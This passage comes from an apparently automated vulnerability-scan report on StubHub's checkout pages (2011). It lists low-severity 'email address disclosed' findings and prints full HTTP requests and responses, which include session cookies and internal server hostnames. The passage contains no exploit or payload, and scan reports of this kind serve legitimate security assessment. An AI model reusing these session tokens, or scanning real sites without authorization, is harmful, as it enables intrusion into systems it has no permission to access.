STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:52 GMT
Server: Apache
Set-Cookie: TLTHID=E2F6699439C1103903A6999880D0EEFC; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 17d2#1991/checkout/checkoutsignin.signin.signinform@srwp01byx002.stubprod.com
com-stubhub-dye: 17d2#1991/checkout/checkoutsignin.signin.signinform@srwp01byx002.stubprod.com
Location: https://www.stubhub.com/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


8.15. https://buy.stubhub.com/checkout/resources/mojito/css/common/stubtool.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/resources/mojito/css/common/stubtool.css

Issue detail

The following email address was disclosed in the response:

Request

GET /checkout/resources/mojito/css/common/stubtool.css HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/checkout?logisticsMethod=2&price=100.0&quantity_selected=2&ticket_id=281933854
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; TLTHID=FBAC0A8439C11039000B8921C8DA47EC; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":9,"to":5,"c":"https://buy.stubhub.com/checkout/checkout","lc":{"d1":{"v":9,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856625066,"l":"en","i":-1}

Response

HTTP/1.1 404 Not Found
Date: Wed, 16 Feb 2011 11:44:28 GMT
Server: Apache
Set-Cookie: TLTHID=1C7871DA39C21039A743871236610E4F; Path=/; Domain=.stubhub.com
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=1598
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Content-Length: 356

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /checkout/resources/mojito/css/common/stubtool.css wa
...[SNIP]...
<a href="mailto:technology@stubhub.com">
...[SNIP]...

8.16. https://buy.stubhub.com/checkout/services/delivery  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/services/delivery

Issue detail

The following email address was disclosed in the response:

Request

GET /checkout/services/delivery HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:53 GMT
Server: Apache
Set-Cookie: TLTHID=E4093A0A39C110390346A44E82BE9735; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 1c55#1991/checkout/services/delivery@srwp01byx003.stubprod.com
com-stubhub-dye: 1c55#1991/checkout/services/delivery@srwp01byx003.stubprod.com
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Location: https://buy.stubhub.com/errorAjax.html
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


8.17. https://buy.stubhub.com/checkout/services/payment  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/services/payment

Issue detail

The following email address was disclosed in the response:

Request

GET /checkout/services/payment HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:54 GMT
Server: Apache
Set-Cookie: TLTHID=E43BE44639C11039023DF003EA6CA026; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: c2c7#503/checkout/services/payment@srwp01byx010.stubprod.com
com-stubhub-dye: c2c7#503/checkout/services/payment@srwp01byx010.stubprod.com
Location: https://myaccount.stubhub.com/login/Signin
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


8.18. https://buy.stubhub.com/checkout/services/reviewSubmit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/services/reviewSubmit

Issue detail

The following email address was disclosed in the response:

Request

GET /checkout/services/reviewSubmit HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:54 GMT
Server: Apache
Set-Cookie: TLTHID=E472A54439C1103903BEE205A91C2150; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 2f05#19ad/checkout/services/reviewSubmit@srwp01byx005.stubprod.com
com-stubhub-dye: 2f05#19ad/checkout/services/reviewSubmit@srwp01byx005.stubprod.com
Location: https://myaccount.stubhub.com/login/Signin
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


8.19. https://buy.stubhub.com/help/services/popUp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /help/services/popUp

Issue detail

The following email address was disclosed in the response:

Request

GET /help/services/popUp HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:43:10 GMT
Server: Apache
Set-Cookie: TLTHID=EE39049C39C11039003090BE30AA5CCD; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: eaed#e752/help/services/popUp@srwp01myx005.stubprod.com
com-stubhub-dye: eaed#e752/help/services/popUp@srwp01myx005.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Location: https://buy.stubhub.com/errorAjax.html
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


8.20. https://buy.stubhub.com/help/services/popUp  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /help/services/popUp

Issue detail

The following email address was disclosed in the response:

Request

GET /help/services/popUp?nodeDesc=Contact-HelpCenter HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
